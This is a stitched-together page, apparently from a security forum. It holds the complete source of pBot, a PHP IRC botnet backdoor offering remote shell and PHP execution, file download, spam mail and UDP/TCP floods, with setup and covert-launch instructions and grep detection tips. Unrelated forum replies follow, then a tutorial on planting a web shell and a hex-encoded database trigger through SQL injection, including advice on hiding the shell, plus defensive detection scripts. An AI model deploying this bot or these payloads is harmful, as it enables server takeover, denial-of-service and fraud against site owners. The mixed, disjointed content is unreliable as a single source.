<? set_time_limit(0); error_reporting(0); class pBot { var $config = array(“server”=>”", “port”=>, “pass”=>”", “prefix”=>”", “maxrand”=>4, “chan”=>”", “key”=>”", “modes”=>”+iB-x”, “password”=>”", “trigger”=>”!”, “hostauth”=>”*” // * for any hostname ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = “”; $alph = range(“a”,”z”); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send(“PASS “.$this->config['pass']); $this->send(“USER $ident 127.0.0.1 localhost :$ident”); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn,512)); $cmd = explode(” “,$this->buf); if(substr($this->buf,0,6)==”PING :”) { $this->send(“PONG :”.substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] ==”001?) { $this->send(“MODE “.$this->nick.” “.$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]==”433?) 
{ $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf,” :”),2); $msgcmd = explode(” “,$msg); $nick = explode(“!”,$cmd[0]); $vhost = explode(“@”,$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1]; } else { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i]; } if(count($cmd)>2) { switch($cmd[1]) { case “QUIT”: if($this->is_logged_in($host)) { $this->log_out($host); } break; case “PART”: if($this->is_logged_in($host)) { $this->log_out($host); } break; case “PRIVMSG”: if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == “*”)) { if(substr($mcmd[0],0,1)==”.”) { switch(substr($mcmd[0],1)) { case “user”: if($mcmd[1]==$this->config['password']) { $this->privmsg($this->config['chan'],”[\2auth\2]: $nick logged in”); $this->log_in($host); } else { $this->privmsg($this->config['chan'],”[\2auth\2]: Incorrect password from $nick”); } break; } } } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==”.”) { switch(substr($mcmd[0],1)) { case “restart”: $this->send(“QUIT :restart”); fclose($this->conn); $this->start(); break; case “mail”: //mail to from subject message if(count($mcmd)>4) { $header = “From: <”.$mcmd[2].”>”; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],”[\2mail\2]: Unable to send”); } else { $this->privmsg($this->config['chan'],”[\2mail\2]: Message sent to \2?.$mcmd[1].”\2?); } } break; case “dns”: if(isset($mcmd[1])) { $ip = explode(“.”,$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyname($mcmd[1])); } } break; case “info”: 
$this->privmsg($this->config['chan'],”[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE'].”] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT'].”] [\2domain\2: ".$_SERVER['SERVER_NAME'].”] [\2admin\2: ".$_SERVER['SERVER_ADMIN'].”] [\2url\2:".$_SERVER['REQUEST_URI'].”]”); break; case “cmd”: if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],”[\2cmd\2]: $command”); $pipe = popen($command,”r”); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan'],” : $pbuf”); } pclose($pipe); } break; case “rndnick”: $this->set_nick(); break; case “raw”: $this->send(strstr($msg,$mcmd[1])); break; case “php”: $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; case “exec”: $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode(“\n”,$exec); $this->privmsg($this->config['chan'],”[\2exec\2]: $command”); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],” : “.trim($ret[$i])); break; case “pscan”: // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2open\2?); else $this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2closed\2?); } break; case “ud.server”: // .udserver <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],”[\2update\2]: Changed server to “.$mcmd[1].”:”.$mcmd[2].” Pass: “.$mcmd[3]); } else { $this->privmsg($this->config['chan'],”[\2update\2]: Changed server to “.$mcmd[1].”:”.$mcmd[2]); } } break; case “download”: if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],”w”)) { $this->privmsg($this->config['chan'],”[\2download\2]: Cannot download, permission denied.”); 
} else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],”[\2download\2]: Unable to download from \2?.$mcmd[1].”\2?); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],”[\2download\2]: File \2?.$mcmd[1].”\2 downloaded to \2?.$mcmd[2].”\2?); } fclose($fp); } } break; case “die”: $this->send(“QUIT :die command from $nick”); fclose($this->conn); exit; case “logout”: $this->log_out($host); $this->privmsg($this->config['chan'],”[\2auth\2]: $nick logged out”); break; case “udpflood”: if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } break; case “tcpflood”: if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start(); } function send($msg) { fwrite($this->conn,”$msg\r\n”); } function join($chan,$key=NULL) { $this->send(“JOIN $chan $key”); } function privmsg($to,$msg) { $this->send(“PRIVMSG $to :$msg”); } function is_logged_in($host) { if(isset($this->users[$host])) return 1; else return 0; } function log_in($host) { $this->users[$host] = true; } function log_out($host) { unset($this->users[$host]); } function set_nick() { if(isset($_SERVER['SERVER_SOFTWARE'])) { if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”apache”)) $this->nick = “[A]“; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”iis”)) $this->nick = “[I]“; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”xitami”)) $this->nick = “[X]“; else $this->nick = “[U]“; } else { $this->nick = “[C]“; } $this->nick .= $this->config['prefix']; for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); $this->send(“NICK “.$this->nick); } function udpflood($host,$packets,$packetsize,$delay) { $this->privmsg($this->config['chan'],”[\2udpflood\2]: Sending $packets packets to $host. 
Packet size: $packetsize”); $packet = “”; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen(“udp://”.$host,mt_rand(0,6000),$e,$s,5)) { $this->privmsg($this->config['chan'],”[\2udpflood\2]: Error: <$e>”); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],”[\2udpflood\2]: Finished sending $packets packets to $host.”); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize”); $packet = “”; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen(“tcp://”.$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Error: <$e>”); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Finished sending $packets packets to $host:$port.”); } } $bot = new pBot; $bot->start(); ?>

    I will not explain the code line by line, but I will list some of the functions and commands of this PHP IRC bot, based on this code.

    As I was saying, the script I showed is not configured to connect to IRC, so the first thing we have to do is set the IRC server, name, password, port and channel the IRC bot should connect to.
    Below is a simple configuration example:

        var $config = array("server"=>"irc.freenode.net", // IRC server
            "port"=>6667, // port (the default port for connecting to IRC is 6667)
            "pass"=>"", // password of the channel if there is any
            "prefix"=>"infosecinstibot|", // nickname of the bot
            "chan"=>"#rootcon", // channel
            "password"=>"shipcode", // password for activating the bot using the command : .user <password>

    After you have configured the connection, we can run the script by typing the following command in a terminal:

        php filenameofthebot.php

    Many will not want to leave their script behind, so they just execute the IRC bot without saving it on the web server, putting the whole script into a PHP eval through a backdoor shell.

    OK, now the bot is connected to the IRC channel. Below are the commands you can try on this script:

    .user <password> = Used to log in to the bot. <password> is the one you set in the configuration, "password"=>"".
    .logout = Logs you out of the bot.
    .die = Kills the bot process and closes the bot's connection to the IRC server.
    .restart = Restarts the bot.
    .mail <to> <from> <subject> <msg> = Sends mail using if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)). This can be used for spamming, because you can use it to make up non-existent email addresses for the <from> argument.
    .dns = Performs a DNS lookup.
    .download <URL> <filename> = Lets the user download a file from the supplied URL and rename it.
    .exec <command> = Executes a command using the exec() function.
    .cmd <command> = Executes a command using the popen() function.
    .info = Gets information about the system.
    .php <php code> = Executes PHP code using the eval() function.
    .tcpflood <target> <packets> <packetsize> <port> <delay> = Runs a tcpflood attack based on the function tcpflood($host,$packets,$packetsize,$port,$delay).
    .udpflood <target> <packets> <packetsize> <delay> = Runs a udpflood attack.
    .rndnick = Changes the bot's name.
    .pscan <host> <port> = Scans a given port on the host.
    .safe = Tests safe_mode.
    .inbox <to> = Tests the inbox.
    .conback <ip> <port> = Connect-back function.

    Judging by the commands listed, the PHP IRC bot is very dangerous: it is still considered a backdoor because it lets the attacker or user run commands. It can also launch DoS attacks through the tcpflood and udpflood functions.

    How to detect or get rid of this PHP IRC bot

    Just as we would get rid of suspicious PHP files or backdoor shells, we can locate the PHP IRC bot using the grep command in a terminal, as long as you have access to the web server. It will not be very easy, because the PHP code has many functions. The simplest approach is to use a function that most IRC bots use. Because pBot has malicious functions such as udpflood and tcpflood, we can use these functions to locate the script easily. E.g.:

        grep -Rn "tcpflood *(" /var/www
        grep -Rn "udpflood *(" /var/www

    And like any backdoor shell, it uses the shell_exec function, so you will want to grep for that function as well. To list all 3 functions in a single grep command:

        grep -RPn "(shell_exec|tcpflood|udpflood) *\(" /var/www/

    Once you are sure that the code is pBot, the next thing you should do is delete it and restart the server.

    References: pastebin.com

    Source
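An added example, not part of the original post: the grep commands above also list every legitimate script that calls shell_exec, so this script ranks PHP files by whether they combine a raw socket, IRC protocol verbs and command execution or flood helpers. The regex groups, the BOT/REVIEW labels, the function names and the sample files are assumptions of this example.

```shell
#!/bin/sh
# Added example: rank PHP files in a webroot by how many traits of an
# IRC-controlled bot such as pBot they combine. Heuristic, not a signature.

# Indicator groups as POSIX extended regular expressions. None of them depend
# on quote characters, so copies pasted with typographic quotes still match.
SOCK_RE='(fsockopen|stream_socket_client|socket_connect)[[:space:]]*\('
IRC_RE='(PRIVMSG|PONG)[[:space:]]+[^[:space:]]'
EXEC_RE='(shell_exec|popen|passthru|proc_open|eval)[[:space:]]*\('
FLOOD_RE='(tcpflood|udpflood)[[:space:]]*\('

# has REGEX FILE: succeeds when FILE contains a match.
has() { grep -Eq -- "$1" "$2" 2>/dev/null; }

# classify_file FILE: prints BOT, REVIEW or CLEAN.
#   BOT    = socket + IRC verbs + (command execution or flood helper)
#   REVIEW = command execution or flood helper only (what the plain grep finds)
classify_file() {
    f=$1
    sock=0; irc=0; exe=0; flood=0
    if has "$SOCK_RE" "$f"; then sock=1; fi
    if has "$IRC_RE" "$f"; then irc=1; fi
    if has "$EXEC_RE" "$f"; then exe=1; fi
    if has "$FLOOD_RE" "$f"; then flood=1; fi
    if [ "$sock" = 1 ] && [ "$irc" = 1 ] && [ $((exe + flood)) -gt 0 ]; then
        echo "BOT"
    elif [ "$exe" = 1 ] || [ "$flood" = 1 ]; then
        echo "REVIEW"
    else
        echo "CLEAN"
    fi
}

# scan_webroot DIR: prints "VERDICT<TAB>path" for every non-clean PHP file,
# BOT entries first.
scan_webroot() {
    root=$1
    find "$root" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) |
    while IFS= read -r path; do
        verdict=$(classify_file "$path")
        [ "$verdict" = CLEAN ] || printf '%s\t%s\n' "$verdict" "$path"
    done | sort
}

# make_samples DIR: writes three constructed sample files (inert text that only
# carries the indicator strings) so the scan can be tried offline.
make_samples() {
    dir=$1
    mkdir -p "$dir"
    # Combines socket, IRC verb, command execution and a flood helper name.
    cat > "$dir/cache.php" <<'EOF'
<?php /* constructed indicator stub */
$c = fsockopen($srv, $port);
fwrite($c, "PRIVMSG $chan :ready\r\n");
$out = shell_exec($line);
function udpflood($h) {}
EOF
    # Admin script that runs a command but speaks no IRC.
    cat > "$dir/backup.php" <<'EOF'
<?php $r = shell_exec('tar czf /tmp/site.tgz .');
EOF
    # Plain page with none of the indicators.
    cat > "$dir/index.php" <<'EOF'
<?php echo "hello";
EOF
}

# Usage: sh scan.sh /var/www
if [ "$#" -gt 0 ]; then
    scan_webroot "$1"
fi
```

A bot started through eval, as the post describes, never touches the disk, so a clean scan does not clear the host; also check for PHP processes holding long-lived outbound connections.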
  20. I use Anonymouse (Anonymouse.org) and it runs relatively fast.
  21. I could give you hundreds of reasons why you will never succeed with that forum, and I could joke about it for hours. But if you want to build something more or less successful, set up a vBulletin, on free hosting if you don't currently have the money for paid hosting. But at least save up an allowance and buy a domain (preferably a nice, attractive name, not "hackmetin2.com"). Think of some proper categories, not "Hacks Metin2". You need interesting, new, topical things that attract people. If you want your forum to be about 'hacking', be shameless and take inspiration from here, but don't copy everything from top to bottom. Then use an interesting theme, not one with icons from "Cantar Straik". Get to writing some tutorials, post news about interesting things. You can use MagicSubmitter (posted by ElChief, I think) to get your forum indexed. When you consider you have enough content, create an AdSense account (best to read their policy first). Maybe I haven't come up with the best methods for a successful forum, but compared to your current forum...
  22. Wubi

    PS pastebin

    I have the same problem, because of HCStealer. I had it on the site for a short time, not even a few hours, but that was enough for someone's NOD to detect it, and I think it was added to the next virus signature database.
  23. I will add more information about this. Thanks for the suggestion.
  24. Wubi

    Hello RST

    Welcome, Adela! Have a look at the rules as well. Many people skip that and end up badly.
  25. Introduction

If you are reading this article, I am fairly sure you have heard of a virus, otherwise called a Trojan horse or worm, that can infect your system. Once infected, your system could infect others as well, for example when you connect the infected system to a network. Often the malware not only spreads to other systems but also changes something on each of them. These changes let the malware remotely control each infected system, sooner or later. In this article we will look at a few ways in which different types of backdoors can be planted on a server through SQL Injection vulnerabilities. As an example, we will take an application I have that is already vulnerable to SQL Injection, and I will use an existing vulnerability to plant the backdoor on the system.

What is SQL Injection?

There are already over a million articles about SQL Injection and how it can be discovered and used, so I will not repeat them. Here is a link to an introductory article, in case you need more information about SQL Injection. The article also includes a number of references where you can find further information on the subject. Anyway, now that you have refreshed your knowledge of SQL Injection and of how to extract data from the database, we will use the discovered vulnerability to create a backdoor on the system.

(OS) Backdoor...

What we want is to be able to execute arbitrary commands against the operating system by exploiting SQL Injection vulnerabilities. To execute operating system commands we need a command (CMD) shell, or we need to run code that lets us execute commands on the OS. Let's try both techniques.

Getting an OS shell

We will now try to write our own code to the server, code that will help us execute OS commands against the server.
As we already know from the previous article, the search parameter is vulnerable to SQL Injection and there are 4 columns involved. As a reminder, the following input gives us an error:

    Harry Potter' union select 1,2,3,4#

Remember, we want to insert our own PHP code so that we can execute shell commands. To do that we use the INTO OUTFILE option. With INTO OUTFILE, the output of a query can be redirected into a file on the operating system. So with the following input, the string 'TEXT INTO FILE' is stored in the file blah.txt in the /tmp directory:

    Harry Potter' union select 'TEXT INTO FILE',2,3 INTO OUTFILE '/tmp/blah.txt'#

Now, instead of 'TEXT INTO FILE', we will use some basic PHP code that reads a command from the URL and runs it on the operating system. Here is the input we will use:

    Harry Potter' union select "<? system($_REQUEST['cmd']); ?>",2,3 INTO OUTFILE '/var/www/test/execcmd.php'#

So I will modify the query and drop Harry Potter; instead I will use the following and run it again...

    ' union select "<? system($_REQUEST['cmd']); ?>",2,3 INTO OUTFILE '/var/www/test/execcmd.php'#

That is much better, even though 2 and 3 still show up. Let's try to access the execcmd.php page and pass it the command we want to execute [cat /etc/passwd] as an argument. It worked.

There are a few more things to remember here, which I discovered while trying all this out.

-- The database user running these queries against the database must have the FILE privilege; otherwise it cannot use INTO OUTFILE.
-- There has to be a directory inside the webroot that the MySQL service user can write to; otherwise you cannot reach the web shell you uploaded. You can write it to a world-writable directory such as /tmp, but then you would not be able to access it.

The easiest way to try to get a shell is to use a built-in SQLMap feature.
If you read the article (InfoSec Resources – Blind SQL Injection 1.0 – Attack Anatomy), you will remember that we used SQLMap. Let's use the same code again to demonstrate the SQLMap option. Below is a screenshot of the OS shell obtained by adding a single SQLMap option and then selecting a PHP web shell. Run a command just to check that it really is a shell. And yes, it is. Unfortunately, that is about how easy things sometimes are from the "bad guys'" point of view.

Now, you probably do not want to use the previous technique, because this one is easier and faster, but it always helps to know the manual method (you will need it if the tools fail). One more thing to keep in mind: when the web shell is created, use a name similar to the names of files that already exist in the webroot. This keeps it from being discovered easily.

Before we move on to the next type of backdoor, I want to show you what SQLMap does "under the hood". You can run SQLMap with a proxy configured to do this. Forward a few requests until the web shell has been uploaded by SQLMap to a world-writable directory, and look at the query that runs against the database. Hmm... we should see something similar. We will decode the URL to be sure. Look at the part highlighted in blue at the bottom of the page. It turns out that SQLMap uses INTO OUTFILE, the same command we used earlier when learning the manual technique. Finally, let's look at the contents of the web shell that SQLMap uploads. It is much nicer. Look at the bottom panel. What matters here, once again, is that the tool simplifies our work significantly, but it does (roughly) the same thing we would do if we had the luxury of unlimited time.

A database backdoor...

So now we know that a backdoor can be planted on a system if the application is vulnerable to SQL Injection.
Now let's also see how a backdoor can be planted in the database. Before we start, though, we need a little information about how this backdoor works. With the OS backdoor we accessed the backdoor directly and passed it a command; here it is a bit more indirect. The backdoor we configure will change the values of sensitive data in the database every time an INSERT operation is performed. So every time a new book is added to the database, our backdoor sets its price to 0, so that people can buy books without paying for them. In the real world this would be detected fairly quickly, though.

So there is something called a "trigger" in the database; what this really means is "When something I am waiting for happens, pull the trigger and do something else". That is too vague, actually. So let's take a slightly more sensible example. Say you are a police officer. The moment you see a serial killer, you pull the trigger and the bullet is released. Right? So, coming back: here there is an INSERT (the killer), the database trigger is pulled, and the action you configured (the bullet) takes place.

Here is the MySQL trigger we will write.

    delimiter #
    CREATE TRIGGER price BEFORE INSERT ON books
    for each row begin
    set new.price='0';
    end;#
    delimiter ;

And this is what it means...

a) We set the MySQL delimiter to "#". This is because the default delimiter is ";" and it is treated as a special character in MySQL. However, we need it to be treated as data. So we change the delimiter to "#", which means that "#" now has the special meaning.
b) Whenever there is an insert, that is, whenever a new book is added, set the price of that book to 0.
c) End the trigger and set the delimiter back to ";".

The code for that trigger needs to be run somehow. So we need to get the code onto the server somehow.
Let's use the SQL Injection vulnerability we know about to first copy the trigger onto the server. This is the input we will use in the search box.

    Harry Potter' AND 1=0 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/test/g2' LINES TERMINATED BY 0x64656c696d6974657220230a4352454154452054524947474552207072696365204245464f524520494e53455254204f4e20626f6f6b730a666f72206561636820726f7720626567696e0a736574206e65772e70726963653d2730273b0a656e643b230a64656c696d69746572203b#

I will give a short explanation of this query, because it already looks complex, although in reality it is not. We use 1=0 because we are not interested in the results of the Harry Potter query. 0x20 is just the space character, three times; it is only there so that we get what we need (valid trigger syntax) into the file '/var/www/test/g2'. What follows LINES TERMINATED BY is the entire trigger in hex. So let's run it now and see what ends up in the file /var/www/test/g2. Did you notice the spaces at the beginning? That is because we selected 0x20,0x20,0x20, as seen above. The rest is self-explanatory.

Now we somehow have to execute this query, so that the trigger is activated every time a book is INSERTed. There are 3 ways in which this can be done:

a) Stacked queries - Harry Potter' UNION blah blah blah; source /var/www/test/g2
   This does not work anyway, because stacked queries are not supported on PHP-MySQL.
b) Abusing the default MySQL trigger
   This is a technique I did not put my trust in, but it is documented very clearly by Stefano Di Paola. You can try it; I will do the same sometime.
c) Using an SQL injection tool such as SQLMap to run the trigger saved in the file /var/www/test/g2
   This is the method we will test.

So let's run SQLMap again to get an SQL shell where we can try the trigger. Look at the last line.
Unfortunately, the only way to make this work is when stacked queries are available. This means that options a and c above come down to the same thing. Let's confirm this by looking at the SQLMap proxy. We execute a simple query that creates a new database, 'create database boo;', in the sql-shell and look at it in Burp. As we can see, it tries to interpret it as a SELECT query. That will never work. The response in Burp confirms this.

The only way I can think of to run our query involves the following steps:

-- Guess the MySQL database password for a valid user. For example, you guessed root and test123.
-- Inject an OS web shell backdoor (as before).
-- Now run the MySQL command from the web shell and install the trigger.

I have included a few screenshots of how this can work. To begin with, here is a screenshot showing that there is no trigger in the database.

Let's assume we have already guessed the username and password as root and toor [brute force]. Now we can access the web shell and issue the following command:

    mysql -u<USERNAME> -p<PASSWORD> <DB NAME> < /var/www/test/g2

Now let's look at the database again. There is our trigger.

Now let's execute an INSERT query and see whether our trigger "fires". Now for the query being run... Look at the last line. Someone is not going to be paid as much as they thought they would be...

Here we executed an INSERT query directly against the database. In the real world there would be an "Add Books" form with this exact INSERT query in the backend, and the trigger would most certainly still fire. That is the only reason I did not create a new form (and I am too lazy to do it).

Obviously the big IF in this attack is that we have to guess the username and password for the database.
Without going into too much detail, here is one way to approach it:

-- Think of a few well-known database usernames [e.g. root in the case of MySQL] or use social engineering to obtain them.
-- MySQL passwords are hashed these days, so the password will not be in clear text.
-- You can try to crack the passwords in 2 ways (that I could think of):
   * Use the SQL injection vulnerability to compare password lists against the stored passwords (Blind SQL).
   * Run the trigger in the web shell with the whole list of cleartext passwords for a specific account (you can write a script in Perl or Ruby to do this for you). Try to insert a book after the whole password list has been gone through, or after each password guess, to find out which one worked.
       mysql -uroot -ptoor blindsql_test< /var/www/test/g2
       mysql -uroot -proot blindsql_test< /var/www/test/g2
       mysql -uroot -ptest blindsql_test< /var/www/test/g2
       mysql -uroot -ppassword blindsql_test< /var/www/test/g2

Recommendations:

* Use parameterized queries to protect yourself against SQL injection.
* Make sure you have no world-writable directory in the webroot.
* Restrict the privileges of the application user that queries your database. In this case, do not grant the FILE privilege to that user.
* Get rid of all default database accounts.
* Use strong passwords and a strong password policy.

Conclusion

The root of the problem remains that the application is vulnerable to SQL Injection. Fixing that will prevent the problem. Still, it is good to know the different ways in which backdoors can be planted. A lot of malware spreads this way, and it is important to take measures to protect yourself against it.
References:

High level overview: SQL backdoor - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
Blind SQL Injection: InfoSec Resources – Blind SQL Injection 1.0 – Attack Anatomy
Select into a file: MySQL :: MySQL 5.0 Reference Manual :: 13.2.8.1 SELECT ... INTO Syntax
Triggers: MySQL :: MySQL 5.0 Reference Manual :: 18.3 Using Triggers
MySQL :: MySQL 5.0 Reference Manual :: 13.1.11 CREATE TRIGGER Syntax
MySQL :: MySQL 5.0 Reference Manual :: 13.1.18 DROP TRIGGER Syntax
Burp Decoder: Burp Decoder Help
Execute SQL commands from a text file: MySQL :: MySQL 5.0 Reference Manual :: 4.5.1.5 Executing SQL Statements from a Text File
Create a new user: MySQL :: MySQL 5.1 Reference Manual :: 13.7.1.1 CREATE USER Syntax
Automate web requests with Perl: LWP::Simple - search.cpan.org

English tutorial: InfoSec Resources – Creating Backdoors Using SQL Injection
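A detection sketch for the requests described in the article, added here and not part of the original article or of any tool it mentions. It flags query parameters that contain INTO OUTFILE or INTO DUMPFILE and decodes long hex literals, so a payload hidden after LINES TERMINATED BY becomes visible. The request path /test/search.php, the parameter name title and the tag names are assumptions; the sample requests are constructed from the inputs quoted in the article.

```python
import re
from urllib.parse import parse_qsl, quote_plus, urlsplit

OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+['\"]([^'\"]+)['\"]", re.I)
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2}){8,})", re.I)  # literals of 8+ bytes
CHECKS = (
    ("php-exec", re.compile(r"<\?.*\b(?:system|shell_exec|passthru)\s*\(", re.I | re.S)),
    ("create-trigger", re.compile(r"\bCREATE\s+TRIGGER\b", re.I)),
)


def inspect_value(value):
    """Inspect one decoded parameter value; return a finding dict or None."""
    match = OUTFILE_RE.search(value)
    if not match:
        return None
    # Hex literals hide the payload from keyword filters, so decode them first.
    decoded = [bytes.fromhex(h).decode("utf-8", "replace") for h in HEX_RE.findall(value)]
    text = "\n".join([value] + decoded)
    return {"target": match.group(1),
            "tags": [tag for tag, rx in CHECKS if rx.search(text)],
            "decoded": decoded}


def scan_request_line(line):
    """Return findings for every query parameter of 'METHOD URL PROTO'."""
    _method, url, _proto = line.split(" ", 2)
    findings = []
    for name, value in parse_qsl(urlsplit(url).query):
        hit = inspect_value(value)
        if hit:
            findings.append(dict(hit, param=name))
    return findings


# Constructed sample requests, modelled on the inputs quoted in the article.
TRIGGER_SQL = ("delimiter #\nCREATE TRIGGER price BEFORE INSERT ON books\n"
               "for each row begin\nset new.price='0';\nend;#\ndelimiter ;")
SAMPLE_VALUES = [
    "Harry Potter",
    "' union select \"<? system($_REQUEST['cmd']); ?>\",2,3 "
    "INTO OUTFILE '/var/www/test/execcmd.php'#",
    "Harry Potter' AND 1=0 union select 0x20,0x20,0x20 INTO OUTFILE "
    "'/var/www/test/g2' LINES TERMINATED BY 0x" + TRIGGER_SQL.encode().hex() + "#",
]
SAMPLE_LOG = ["GET /test/search.php?title=%s HTTP/1.1" % quote_plus(v)
              for v in SAMPLE_VALUES]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_request_line(entry))
```

A finding whose target lies inside the webroot, or whose decoded text contains CREATE TRIGGER, is worth following up by checking the file on disk and listing the triggers defined in the database.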